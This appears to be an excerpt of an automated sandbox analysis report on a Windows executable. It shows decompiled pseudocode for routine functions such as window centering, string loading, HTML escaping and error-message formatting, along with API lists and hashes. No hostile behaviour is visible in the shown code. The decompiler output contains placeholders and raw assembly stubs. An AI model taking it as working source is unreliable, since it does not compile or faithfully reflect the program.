Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 8b95306214ac587ba0897fcd046ca2e4eeea29109f78b8f4090a977e67bd8f40
Instruction ID: 71d6d288c8c0cbb2a230865f183c91b33313cb8a4c206b23d80a388f73b59e38
Opcode Fuzzy Hash: 8b95306214ac587ba0897fcd046ca2e4eeea29109f78b8f4090a977e67bd8f40
Instruction Fuzzy Hash: 0B01D1763612116BD3315BB49D8DB7F7AD8EB81759B10403AF502F36C0EAB8C90982AD

Uniqueness

Uniqueness Score: -1.00%

Function 00405B17, Relevance: 15.1, APIs: 10, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00405B17(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}

0x00405b17
0x00405b2a
0x00405b2d
0x00405b34
0x00405b3a
0x00405b3c
0x00405b4f
0x00405b59
0x00405b60
0x00405b62
0x00405b62
0x00405b75
0x00405b7b
0x00405b86
0x00405b8a
0x00405b8c
0x00405b95
0x00405b96
0x00405b97
0x00405b9d
0x00405b9f
0x00405ba5
0x00405baf
0x00405bb0
0x00405bb1
0x00405bb4
0x00405bb4
0x00405b8a
0x00405bbb
0x00405bbe
0x00405bcd
0x00405bd4
0x00405bc0
0x00405bc0
0x00405bc0
0x00405bdb
0x00405bde
0x00405bf3
0x00405bf3
0x00000000
0x00405be0
0x00405be9
0x00405bee
0x00405bf1
0x00405bf5
0x00405bf7
0x00405bf9
0x00405bf9
0x00405c16
0x00405c16
0x00000000
0x00405bf1

APIs

GetSystemMetrics.USER32 ref: 00405B30
GetSystemMetrics.USER32 ref: 00405B36
GetDC.USER32(00000000), ref: 00405B43
GetDeviceCaps.GDI32(00000000,00000008), ref: 00405B54
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00405B5B
ReleaseDC.USER32 ref: 00405B62
GetWindowRect.USER32 ref: 00405B75
GetParent.USER32(?), ref: 00405B80
GetWindowRect.USER32 ref: 00405B9D
MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00405C0C

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
String ID:
API String ID: 2163313125-0
Opcode ID: 62d34707e84acb0b8d4d630ad042eb52563104a98599b23053d4d9526d36ec3e
Instruction ID: 16e951d772d83260d2b373081c0788c8dcba8c3ecadbacc9f3e1e8367de9e11c
Opcode Fuzzy Hash: 62d34707e84acb0b8d4d630ad042eb52563104a98599b23053d4d9526d36ec3e
Instruction Fuzzy Hash: F6316072900619AFDB10CFB8CD85AEEBBB8EB48314F054179E901F7290DA75BD458F94

Uniqueness

Uniqueness Score: -1.00%

Function 00401ED6, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00401ED6(signed int __ecx, void* __edx, intOrPtr* _a4) {
				char _v516;
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				void _v546;
				char _v548;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				intOrPtr _v576;
				int _v580;
				short _v582;
				void _v584;
				intOrPtr _v588;
				signed int _v592;
				signed int _v596;
				wchar_t* _v600;
				signed int _v604;
				intOrPtr _v624;
				char _v632;
				void* __ebx;
				void* __edi;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t97;
				signed int _t104;
				int _t124;
				intOrPtr _t126;
				signed int _t127;
				void* _t131;
				intOrPtr* _t151;
				signed int _t153;
				void* _t156;
				void* _t157;

				_t134 = __ecx;
				_v592 = __ecx;
				_v584 = 0;
				_v582 = 0;
				_v580 = 0;
				_v588 = 0x40f634;
				_t73 = memset( &_v584, 0, 0x44);
				_t126 =  *0x41235c; // 0x0
				_t151 = _a4;
				_t74 = _t73 | 0xffffffff;
				_t156 = (_t153 & 0xfffffff8) - 0x254 + 0xc;
				_v572 = _t74;
				_v568 = _t74;
				_v564 = _t74;
				_v560 = _t74;
				_t127 = _t126 - 1;
				_v520 = 0;
				_v600 =  *((intOrPtr*)(_t151 + 0x28));
				if(_t127 < 0) {
					L3:
					_t127 = _t127 | 0xffffffff;
				} else {
					while(1) {
						_t124 = wcscmp(_v600, E00406306(0x412340, _t127));
						_pop(_t134);
						if(_t124 == 0) {
							goto L4;
						}
						_t127 = _t127 - 1;
						if(_t127 >= 0) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
				}
				L4:
				if(_t127 != 0xffffffff) {
					_t76 = _t127;
				} else {
					_t76 = E00406264(0x412340, _t134, _v600);
				}
				_v556 = _t76;
				_v524 =  *((intOrPtr*)(_t151 + 0x2c));
				_v548 =  *_t151;
				_v544 =  *((intOrPtr*)(_t151 + 4));
				_v540 =  *((intOrPtr*)(_t151 + 8));
				_v536 =  *((intOrPtr*)(_t151 + 0xc));
				_v532 =  *((intOrPtr*)(_t151 + 0x10));
				_t129 = _v592 + 0x84c;
				_v528 =  *((intOrPtr*)(_t151 + 0x14));
				_v596 = _v592 + 0x84c;
				E00406434(_v592 + 0x84c,  *((intOrPtr*)(_t151 + 0x20)), 0xffffffff, 0);
				_v580 = E00406264(0x412320, _t134, E0040636E(_t129));
				E00406434(_t129,  *((intOrPtr*)(_t151 + 0x24)), 0xffffffff, 0);
				_v592 = E00406264(0x412320, _t134, E0040636E(_t129));
				_t131 = _v624 + 0x860;
				 *((intOrPtr*)(_t131 + 0x1c)) = 0;
				 *((intOrPtr*)(_t131 + 4)) = 0;
				_v632 = 0;
				_v548 = 0;
				memset( &_v546, 0, 0x1fe);
				_t97 = E0040610D(_t134,  &_v632,  &_v548, 0xff,  *((intOrPtr*)(_t151 + 0x1c)), ".", 0);
				_t157 = _t156 + 0x20;
				while(_t97 != 0) {
					E00406264(_t131, _t134,  &_v516);
					_t97 = E0040610D(_t134,  &_v604,  &_v520, 0xff,  *((intOrPtr*)(_t151 + 0x1c)), ".", 0);
					_t157 = _t157 + 0x14;
				}
				E0040637A(_t97 | 0xffffffff, _v596, 0x40f454);
				_t104 = _v596;
				_v604 = _v604 & 0x00000000;
				if( *((intOrPtr*)(_t104 + 0x87c)) > 0) {
					do {
						if(_v600 != 0) {
							_t166 = _t104 | 0xffffffff;
							E004063DD(_t104 | 0xffffffff, _t134, _v596, _t104 | 0xffffffff, ".");
						}
						E004063DD(E00406306(_t131,  *((intOrPtr*)(_v592 + 0x87c)) - _v600 - 1) | 0xffffffff,  *((intOrPtr*)(_v592 + 0x87c)) - _v600 - 1, _v596, _t166, _t116);
						_v604 = _v604 + 1;
						_t104 = _v596;
						_t134 = _v604;
					} while (_v604 <  *((intOrPtr*)(_t104 + 0x87c)));
				}
				_v576 = E00406264(0x412320, _t134, E0040636E(_v596));
				_v576 = E00406264(0x412320, _t134,  *((intOrPtr*)(_t151 + 0x18)));
				return E00408603( &(_v600[0xffffffffffffff2d]),  &_v596, _t134);
			}

0x00401ed6
0x00401eef
0x00401ef3
0x00401ef8
0x00401efd
0x00401f01
0x00401f09
0x00401f0e
0x00401f14
0x00401f17
0x00401f1a
0x00401f1d
0x00401f21
0x00401f25
0x00401f29
0x00401f30
0x00401f33
0x00401f37
0x00401f3b
0x00401f5c
0x00401f5c
0x00000000
0x00401f3d
0x00401f4e
0x00401f56
0x00401f57
0x00000000
0x00000000
0x00401f59
0x00401f5a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00401f5a
0x00401f3d
0x00401f5f
0x00401f62
0x00401f74
0x00401f64
0x00401f6d
0x00401f6d
0x00401f7a
0x00401f81
0x00401f87
0x00401f8e
0x00401f95
0x00401f9c
0x00401fa9
0x00401fb0
0x00401fb6
0x00401fba
0x00401fbe
0x00401fdb
0x00401fdf
0x00401fff
0x00402007
0x0040200f
0x00402012
0x00402015
0x00402019
0x0040201e
0x0040203a
0x0040203f
0x00402070
0x0040204b
0x00402068
0x0040206d
0x0040206d
0x00402080
0x00402085
0x00402089
0x00402095
0x00402097
0x0040209c
0x004020a7
0x004020aa
0x004020aa
0x004020cd
0x004020d2
0x004020d6
0x004020da
0x004020de
0x00402097
0x004020ff
0x0040210a
0x00402126

APIs

memset.MSVCRT ref: 00401F09
wcscmp.MSVCRT ref: 00401F4E
memset.MSVCRT ref: 0040201E

Strings

#A, xrefs: 00401FCB
#A, xrefs: 00401FEC
@#A, xrefs: 00401F3F
@#A, xrefs: 00401F68
#A, xrefs: 004020F0

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcscmp
String ID: #A$ #A$ #A$@#A$@#A
API String ID: 243296809-3329557610
Opcode ID: 22725e31c05f3c2c753fedfd645125ca20493b01ca7e0e87f454b40cccc93761
Instruction ID: dbc7ccb7a4322fbd292e3ccaf68edd9f7786ca1a27a33b966897527a52c99039
Opcode Fuzzy Hash: 22725e31c05f3c2c753fedfd645125ca20493b01ca7e0e87f454b40cccc93761
Instruction Fuzzy Hash: D2612D715083419FC310EF6AC981A1BB7E4AF88324F108A3EF5A9E72E1D779D4158B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040DBDA, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040DBDA(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}

0x0040dbdf
0x0040dbe1
0x0040dbe3
0x0040dbe4
0x0040dbe4
0x0040dbeb
0x00000000
0x00000000
0x0040dbed
0x0040dbee
0x0040dc56
0x0040dc57
0x0040dc5c
0x0040dc5f
0x0040dc68
0x0040dc6c
0x0040dc6f
0x00000000
0x0040dc6f
0x0040dc78
0x0040dbf5
0x0040dbf9
0x0040dc07
0x0040dc24
0x0040dc33
0x0040dc4e
0x0040dc63
0x0040dc67
0x0040dc50
0x0040dc50
0x0040dc51
0x00000000
0x0040dc51
0x0040dc35
0x0040dc35
0x0040dc37
0x00000000
0x0040dc37
0x0040dc26
0x0040dc26
0x0040dc28
0x0040dc3c
0x0040dc3d
0x0040dc42
0x0040dc45
0x0040dc45
0x0040dc09
0x0040dc11
0x0040dc16
0x0040dc19
0x0040dc19
0x0040dbfb
0x0040dbfb
0x0040dbfc
0x00000000
0x0040dbfc
0x00000000
0x0040dbf9

APIs

memcpy.MSVCRT ref: 0040DC11
memcpy.MSVCRT ref: 0040DC3D
memcpy.MSVCRT ref: 0040DC57

Strings

", xrefs: 0040DC0B
°, xrefs: 0040DC28
<br>, xrefs: 0040DC51
>, xrefs: 0040DBFC
<, xrefs: 0040DBEE
&, xrefs: 0040DC37

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: e515d9530c1f27c32394133f4687b1e06294851c867495ee72b8dfb23976abf6
Instruction ID: 0c92722b5564fee70601bedc3038ef5bb71485c7004a8157c6d80a0c5a0d985f
Opcode Fuzzy Hash: e515d9530c1f27c32394133f4687b1e06294851c867495ee72b8dfb23976abf6
Instruction Fuzzy Hash: E001C0A2E6826061FA3021968C86FBA15549BA2B10FA0013BB986352C6D1FD09CFC15F

Uniqueness

Uniqueness Score: -1.00%

Function 00406827, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00406827(signed short __ebx) {
				signed int _t21;
				void* _t22;
				intOrPtr _t23;
				struct HINSTANCE__* _t25;
				signed int _t27;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				void* _t35;
				signed short _t39;
				signed int _t40;
				signed int _t42;
				intOrPtr _t43;
				signed int _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;
				void* _t72;
				void* _t73;

				_t39 = __ebx;
				if( *0x413288 == 0) {
					E00406785();
				}
				_t40 =  *0x413280; // 0x18
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(1) {
						_t55 =  *0x413278; // 0x587208
						if(_t39 ==  *((intOrPtr*)(_t55 + _t21 * 4))) {
							break;
						}
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t52 =  *0x41327c; // 0x587610
					_t53 =  *0x413270; // 0x2120048
					_t57 = _t53 +  *(_t52 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x412c38 == 0) {
							_t23 =  *0x413290; // 0x1000
							_push(_t23 - 1);
							_push( *0x413274);
							_push(_t39);
							_t25 = E0040698D();
							goto L15;
						} else {
							wcscpy(0x412e48, L"strings");
							_t35 = E00406D16(_t39,  *0x413274);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_t46 =  *0x413290; // 0x1000
								_push(_t46 - 1);
								_push( *0x413274);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x413274);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_t49 =  *0x413290; // 0x1000
						_push(_t49 - 1);
						_push( *0x413274);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40f454;
					} else {
						_t27 =  *0x413284; // 0xcd
						_t10 = _t61 + 2; // 0xcf
						_t72 = _t27 + _t10 -  *0x413288; // 0x8000
						if(_t72 >= 0) {
							goto L20;
						} else {
							_t42 =  *0x413280; // 0x18
							_t73 = _t42 -  *0x41328c; // 0x100
							if(_t73 >= 0) {
								goto L20;
							} else {
								_t43 =  *0x413270; // 0x2120048
								_t57 = _t43 + _t27 * 2;
								_t14 = _t61 + 2; // 0x2
								memcpy(_t57,  *0x413274, _t61 + _t14);
								_t30 =  *0x413280; // 0x18
								_t44 =  *0x413284; // 0xcd
								_t54 =  *0x41327c; // 0x587610
								 *(_t54 + _t30 * 4) = _t44;
								_t31 =  *0x413280; // 0x18
								_t45 =  *0x413278; // 0x587208
								 *(_t45 + _t31 * 4) = _t39;
								_t32 =  *0x413284; // 0xcd
								 *0x413280 =  *0x413280 + 1;
								 *0x413284 = _t32 + _t61 + 1;
								if(_t57 != 0) {
									goto L21;
								} else {
									goto L20;
								}
							}
						}
					}
				}
				return _t22;
			}

0x00406827
0x0040682e
0x00406830
0x00406830
0x00406835
0x0040683c
0x00406841
0x00406853
0x00406853
0x00406843
0x00406843
0x00406843
0x0040684c
0x00000000
0x00000000
0x0040684e
0x00406851
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406851
0x00406880
0x00406889
0x0040688f
0x0040688f
0x00406855
0x00406857
0x00406988
0x00406988
0x0040685d
0x00406863
0x0040689c
0x004068eb
0x004068f1
0x004068f2
0x004068f8
0x004068f9
0x00000000
0x0040689e
0x004068a8
0x004068b4
0x004068b9
0x004068be
0x004068d2
0x004068d4
0x004068da
0x004068e1
0x004068e2
0x004068e8
0x00000000
0x004068c0
0x004068cb
0x004068d0
0x00000000
0x00000000
0x004068d0
0x004068be
0x00406865
0x00406866
0x0040686c
0x00406873
0x00406874
0x0040687d
0x004068fe
0x00406905
0x00406907
0x00406907
0x00406909
0x00406981
0x00406981
0x0040690b
0x0040690b
0x00406910
0x00406914
0x0040691a
0x00000000
0x0040691c
0x0040691c
0x00406922
0x00406928
0x00000000
0x0040692a
0x0040692a
0x00406930
0x00406933
0x0040693f
0x00406944
0x00406949
0x0040694f
0x00406955
0x00406958
0x0040695d
0x00406963
0x00406966
0x0040696e
0x0040697a
0x0040697f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040697f
0x00406928
0x0040691a
0x00406909
0x0040698c

APIs

GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
wcscpy.MSVCRT ref: 004068A8

Part of subcall function 00406D16: memset.MSVCRT ref: 00406D29
Part of subcall function 00406D16: _itow.MSVCRT ref: 00406D37

wcslen.MSVCRT ref: 004068C6
GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
memcpy.MSVCRT ref: 0040693F

Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067BF
Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067DD
Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067FB
Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 00406819

Strings

strings, xrefs: 0040689E

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: strings
API String ID: 3166385802-3030018805
Opcode ID: c72559ebadd3ea1b83e8afb84d1d37b4e66ec646cef112fd2340ea135da12479
Instruction ID: b83127d2a15bee255c74f42c5a27ad94469461630f4946f0f4b43b8e5d041769
Opcode Fuzzy Hash: c72559ebadd3ea1b83e8afb84d1d37b4e66ec646cef112fd2340ea135da12479
Instruction Fuzzy Hash: 1641B375200102AFDB14FF18ED849B673A1F754306711C1FEE806B76A1DB7AAA22CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 00406050, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00406050(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 8;
				do {
					_push( *_t52);
					_push( *((intOrPtr*)(_t52 - 4)));
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040DFD6();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}

0x0040605b
0x0040606a
0x00406071
0x00406079
0x0040607c
0x0040607f
0x00406082
0x00406089
0x00406089
0x00406091
0x00406094
0x00406099
0x0040609e
0x0040609f
0x004060ab
0x004060b0
0x004060c3
0x004060cd
0x004060d1
0x004060d6
0x004060e4
0x004060ec
0x004060ef
0x004060f2
0x004060f2
0x004060f5
0x004060f5
0x004060fb
0x004060fe
0x00406102
0x0040610c

APIs

memset.MSVCRT ref: 00406071
_snwprintf.MSVCRT ref: 0040609F
wcslen.MSVCRT ref: 004060AB
memcpy.MSVCRT ref: 004060C3
wcslen.MSVCRT ref: 004060D1
memcpy.MSVCRT ref: 004060E4

Strings

%s (%s), xrefs: 00406094

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpywcslen$_snwprintfmemset
String ID: %s (%s)
API String ID: 3979103747-1363028141
Opcode ID: 30fd9e651f075bdc212a63d8535efddc7708ae92d198bbf9a9235320ecc61d8a
Instruction ID: f719391f3769af673f645ccb22e5d53aea3ed69308020c87343d88254f0aea6b
Opcode Fuzzy Hash: 30fd9e651f075bdc212a63d8535efddc7708ae92d198bbf9a9235320ecc61d8a
Instruction Fuzzy Hash: 27119072800119EBCF20DF95CC45ECAB7F9FF00308F1144BAE944B7152EBB5A6588B94

Uniqueness

Uniqueness Score: -1.00%

Function 00406F88, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00406F88(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040E340(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040E03E();
					if(_t26 != 0) {
						E00406E5E(_t34,  &_v8712);
					}
				}
				return 1;
			}

0x00406f90
0x00406fa6
0x00406fad
0x00406fb8
0x00406fbe
0x00406fcf
0x00406fd7
0x00406fef
0x00406ff6
0x0040700d
0x00407013
0x00407019
0x0040701e
0x0040701f
0x00407028
0x00407032
0x00407038
0x00407028
0x0040703f

APIs

memset.MSVCRT ref: 00406FAD
GetDlgCtrlID.USER32 ref: 00406FB8
GetWindowTextW.USER32 ref: 00406FCF
memset.MSVCRT ref: 00406FF6
GetClassNameW.USER32 ref: 0040700D
_wcsicmp.MSVCRT ref: 0040701F

Part of subcall function 00406E5E: memset.MSVCRT ref: 00406E71
Part of subcall function 00406E5E: _itow.MSVCRT ref: 00406E7F

Strings

sysdatetimepick32, xrefs: 00407019

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
String ID: sysdatetimepick32
API String ID: 1028950076-4169760276
Opcode ID: 9d19a4fbb2cd0ec1623eaacac27ee37a612a64ef46b18b0cb24cdd6c82670a9a
Instruction ID: 57a1b33134393eb8e1d887e85ad6c32cde466d51f9494c9a374c65f7fd7f5279
Opcode Fuzzy Hash: 9d19a4fbb2cd0ec1623eaacac27ee37a612a64ef46b18b0cb24cdd6c82670a9a
Instruction Fuzzy Hash: 0C11A7329042197ADB24EF91DD49A9B7B7CEF04750F0040BAF508E2091E7755A55CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004052B3, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
librarywindowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004052B3(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40f454);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}

0x004052b3
0x004052c1
0x004052c9
0x004052ce
0x004052d8
0x004052e0
0x004052e2
0x004052e2
0x004052e0
0x004052fe
0x0040532d
0x00405300
0x0040530b
0x00405313
0x00405319
0x0040531d
0x0040531d
0x00405337

APIs

LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004053D9,?,00000000,?,004097E7,00000000,?,?,00000001), ref: 004052D8
FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004053D9,?,00000000,?,004097E7), ref: 004052F6
wcslen.MSVCRT ref: 00405303
wcscpy.MSVCRT ref: 00405313
